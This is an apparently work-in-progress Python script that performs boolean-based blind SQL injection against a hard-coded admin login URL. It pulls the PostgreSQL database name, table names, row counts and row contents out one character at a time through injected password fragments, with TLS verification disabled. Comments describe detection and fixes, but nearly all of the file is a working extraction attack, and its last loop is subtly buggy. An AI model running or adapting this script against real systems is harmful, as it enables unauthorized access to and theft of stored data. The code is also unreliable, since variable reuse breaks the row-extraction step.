Blind SQLi script
Note: Work in progress...
#!/usr/bin/python3
import requests
import sys
import banner
# Candidate characters for the character-at-a-time probes in the steps below.
# Note that this list shadows the builtin `chr`; it is only used as a sequence.
chr = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '-', '_', '.','(',')',',']
# [DB Variables]
# Values recovered from the boolean oracle are accumulated here. The three
# dicts are keyed by 1-based table index (the loops below store into [j+1]/[t+1]).
db_len=0
db_name=""
tb_count=0
tb_name_length={}
tb_name={}
tb_rows={}
if(len(sys.argv)<2):
print("Command: ./blind-sqli.py -d <SQL-data for e.g. database-name> -s <true-condition-status-code>\n\nSupported SQL Languages:\n*PostgreSQL")
else:
# [Request Setup]
# Both flags are mandatory: list.index raises ValueError if '-d' or '-s' is
# absent. The '-d' value is kept in sqldata but is not referenced by any step
# below (the header marks the script as work in progress).
temp=sys.argv.index('-d')+1
sqldata=str(sys.argv[temp])
temp=sys.argv.index('-s')+1
statuscode=str(sys.argv[temp])
# Target URL and form body are hard-coded. Each probe replaces '{inject}' with
# a SQL fragment, so every request is a login POST whose password field
# carries the fragment; the fragment is split back into a dict on '&' and '='
# before posting.
url="https://admin.megalogistic.com/"
data="username=admin&password={inject}"
reqheaders={'Content-Type':'application/x-www-form-urlencoded'}
# cookies={'':''}
# r = requests.post(url, data=post_parameters, headers=headers, cookies=cookies)
# Every step below is a boolean-based blind oracle: a PostgreSQL condition is
# appended to the password and the HTTP status code, compared with the -s
# value, decides true/false. From the server side this is a burst of login
# POSTs whose password starts with "') or" and ends with "--", one request per
# probed value -- a pattern login-rate alerting and WAF rules can flag. The
# oracle exists only because the password is interpolated into SQL and a
# true condition yields a distinct status code; parameterized queries remove
# the injection and a uniform failed-login response removes the oracle.
# [Database Name]
# 1. DB Length
# Counts up from 1 until the status code matches. There is no upper bound, so
# an endpoint that never returns the expected code keeps this loop (and the
# identical ones in steps 3, 4 and 6) issuing requests indefinitely.
flag=1
ctr=1
while(flag):
sqlquery="') or length(current_database())="+str(ctr)+"--"
temp=data.replace('{inject}',sqlquery)
temp2=dict()
for i in temp.split("&"):
temp2[i.split("=",1)[0]] = i.split("=",1)[1]
# verify=False disables TLS certificate verification; every request in this
# script is sent the same way.
r = requests.post(url, data=temp2,headers=reqheaders,verify=False, allow_redirects=False)
if(str(r.status_code) == str(statuscode)):
flag=0
else:
ctr+=1
db_len = ctr
print("Length(Database Name)=",str(db_len))
# 2. DB Name
# One oracle request per (position, candidate) pair; `break` stops at the
# first candidate the oracle accepts for that position.
for m in range(1,db_len+1):
for j in range(len(chr)):
sqlquery = "') or substring(current_database(),"+str(m)+",1)='" + chr[j] + "'--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
db_name+=chr[j]
break
else:
continue
print("Database Name=", db_name)
# [where table_schema='public'] are user created tables
# 3. No. of Tables in Current DB
# Same count-up loop as step 1, against information_schema.tables.
flag = 1
ctr = 1
while (flag):
sqlquery = "') or (select count(TABLE_NAME)="+str(ctr)+" from information_schema.tables where table_schema='public')--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
flag = 0
else:
ctr += 1
tb_count = ctr
print("No. of Tables=", str(tb_count))
# 4. Length of Table Names
# Tables are addressed by `limit 1 offset j`; results are stored under j+1.
for j in range(tb_count):
flag = 1
ctr = 1
while (flag):
sqlquery = "') or (select length(TABLE_NAME)="+str(ctr)+" from information_schema.tables where table_schema='public' limit 1 offset "+str(j)+")--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
flag = 0
else:
ctr += 1
tb_name_length[j+1]=ctr
print("Length of name of table-"+str(j+1)+" :", str(tb_name_length[j+1]))
# 5. Table Names
# Character-at-a-time recovery as in step 2, bounded by the lengths from step 4.
for t in range(tb_count):
tb_name[t+1]=""
for m in range(1, tb_name_length[t+1] + 1):
for j in range(len(chr)):
sqlquery = "') or (select substring(TABLE_NAME,"+str(m)+",1)='"+chr[j]+"' from information_schema.tables where table_schema='public' limit 1 offset "+str(t)+")--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
tb_name[t+1] += chr[j]
break
else:
continue
print("Name of table-"+str(t+1)+" :", tb_name[t+1])
# 6. No. of Rows in Tables
# The table name recovered in step 5 is spliced into the query text here.
for j in range(tb_count):
flag = 1
ctr = 1
while (flag):
sqlquery = "') or (select count(*)="+str(ctr)+" from "+tb_name[j+1]+")--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
flag = 0
else:
ctr += 1
tb_rows[j+1]=ctr
print("No. of rows in table-"+str(j+1)+" :", str(tb_rows[j+1]))
# 7. Data in rows
# Reads each row cast to text (r::text) one character at a time, printing the
# partial value after every accepted character and treating ')' as the
# end-of-row marker.
for t in range(tb_count):
rdata=""
for r in range(tb_rows[t+1]):
flag=1
l=1
while flag:
for j in range(len(chr)):
sqlquery = "') or (select substring(r::text,"+str(l)+",1)='"+chr[j]+"' from "+tb_name[t+1]+" AS r limit 1 offset "+str(t)+")--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
rdata += chr[j]
l+=1
print(rdata)
if (chr[j] == ')'):
flag = 0
break
else:
continue
print("Row-"+str(r+1)+" of table-"+str(t+1)+" :"+ rdata)